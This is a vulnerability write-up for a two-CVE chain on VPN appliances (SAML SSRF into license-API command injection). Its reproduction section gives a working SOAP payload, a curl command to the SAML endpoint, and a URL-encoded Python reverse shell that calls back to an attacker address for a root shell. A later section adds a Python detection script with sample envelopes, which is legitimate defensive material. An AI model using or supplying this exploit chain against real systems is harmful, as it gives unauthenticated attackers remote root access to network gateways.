CVE-2024-21893 / CVE-2024-21887

Updated 26 May 2026

Background

SSRF in SAML Component

CVSS: 8.2 High
VECTOR: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
IMPACT: Server-side request forgery, Unauthorized resource access
AFFECTED: Connect Secure 9.x < 22.x; Policy Secure 9.x < 22.x; Neurons for ZTA: all

A server-side request forgery vulnerability in the SAML component allows an unauthenticated attacker to make the appliance issue arbitrary HTTP requests — including to internal services not exposed externally.

Background

Command Injection via License API

CVSS: 9.1 Critical
VECTOR: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
IMPACT: Remote code execution
AFFECTED: Connect Secure 9.x < 22.x; Policy Secure 9.x < 22.x; Neurons for ZTA: all

A command injection vulnerability in the /api/v1/license/keys-status endpoint allows authenticated administrators to execute arbitrary commands on the appliance. The endpoint listens on localhost port 8090 without front-end authentication checks — making it reachable via SSRF without credentials.

Reproduction

POC || GTFO

When chained, the two vulnerabilities allow an unauthenticated attacker to achieve remote code execution.

Step 1 — Confirm SSRF (CVE-2024-21893)

Create a SOAP envelope (post_data.xml) with a RetrievalMethod URI pointing to an attacker-controlled listener:

post_data.xml:
<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
        <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
      </ds:SignedInfo>
      <ds:SignatureValue>qwerty</ds:SignatureValue>
      <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                  xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig"
                  xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        <ds:RetrievalMethod URI="http://192.168.86.35:4488/exploit.se"/>
        <ds:X509Data/>
      </ds:KeyInfo>
      <ds:Object></ds:Object>
    </ds:Signature>
  </soap:Body>
</soap:Envelope>

Send it to the SAML endpoint of the appliance:

curl -ik -X POST -H "Content-Type: text/xml" --data @post_data.xml https://192.168.86.111/dana-ws/saml20.ws

Capture the callback with netcat to confirm SSRF execution.

Step 2 — Chain to RCE (CVE-2024-21887)

Update the RetrievalMethod URI in the SOAP envelope to point at the internal license endpoint with a URL-encoded Python reverse shell payload, then send the same request:

http://127.0.0.1:8090/api/v1/license/keys-status/%3Bpython%20%2Dc%20%27import%20socket%2Csubprocess%3Bs%3Dsocket%2Esocket%28socket%2EAF%5FINET%2Csocket%2ESOCK%5FSTREAM%29%3Bs%2Econnect%28%28%22192%2E168%2E86%2E35%22%2C4488%29%29%3Bsubprocess%2Ecall%28%5B%22%2Fbin%2Fsh%22%2C%22%2Di%22%5D%2Cstdin%3Ds%2Efileno%28%29%2Cstdout%3Ds%2Efileno%28%29%2Cstderr%3Ds%2Efileno%28%29%29%27%3B

This routes the SSRF through to the command injection endpoint, resulting in a root-level reverse shell on the target appliance.
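Added here as a defensive example, not code from the original page or from the vendor: a small Python scanner for captured POST bodies to /dana-ws/saml20.ws that extracts every ds:RetrievalMethod URI and labels it by the pattern the two steps above rely on (an absolute http(s) fetch, a fetch aimed at loopback, and a loopback fetch of /api/v1/license/keys-status whose decoded path carries shell metacharacters). The heuristics, label names and sample envelopes are my own constructions.

```python
import ipaddress
import xml.etree.ElementTree as ET
from urllib.parse import unquote, urlparse

DS_NS = "{http://www.w3.org/2000/09/xmldsig#}"
LICENSE_PATH = "/api/v1/license/keys-status"  # internal endpoint named in the advisory
SHELL_META = set(";|&`$\n")                    # characters that never belong in a key-status path


def retrieval_uris(soap_body):
    """Extract every ds:RetrievalMethod URI from a captured SOAP body (empty list on bad XML)."""
    try:
        root = ET.fromstring(soap_body)
    except ET.ParseError:
        return []
    return [el.get("URI", "") for el in root.iter(DS_NS + "RetrievalMethod")]


def classify_uri(uri):
    """'benign' = same-document reference; 'ssrf-outbound' = appliance fetches a remote URL;
    'ssrf-loopback' = fetch aimed at the appliance's own services;
    'command-injection' = loopback fetch of the license endpoint with metacharacters in the path."""
    p = urlparse(uri)
    if p.scheme not in ("http", "https"):
        return "benign"
    host = p.hostname or ""
    try:
        loopback = ipaddress.ip_address(host).is_loopback
    except ValueError:
        loopback = host == "localhost"  # hostname rather than literal address
    if loopback and p.path.startswith(LICENSE_PATH):
        tail = unquote(p.path[len(LICENSE_PATH):])  # decode %3B etc. before inspecting
        if SHELL_META & set(tail):
            return "command-injection"
    return "ssrf-loopback" if loopback else "ssrf-outbound"


def scan(soap_body):
    """Return (uri, label) pairs for one captured request body."""
    return [(u, classify_uri(u)) for u in retrieval_uris(soap_body)]


# Constructed sample bodies for a stand-alone run (not captures from a real appliance).
ENVELOPE = ('<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
            '<soap:Body><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">'
            '<ds:KeyInfo><ds:RetrievalMethod URI="{uri}"/></ds:KeyInfo>'
            '</ds:Signature></soap:Body></soap:Envelope>')
SAMPLES = [ENVELOPE.format(uri="#KeyInfo-1"),
           ENVELOPE.format(uri="http://192.168.86.35:4488/exploit.se"),
           ENVELOPE.format(uri="http://127.0.0.1:8090/api/v1/license/keys-status/%3Becho%20probe")]

if __name__ == "__main__":
    for body in SAMPLES:
        print(scan(body))
```

Any absolute http(s) RetrievalMethod in a request to this endpoint is worth an alert on its own; the command-injection label only adds the chained case.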
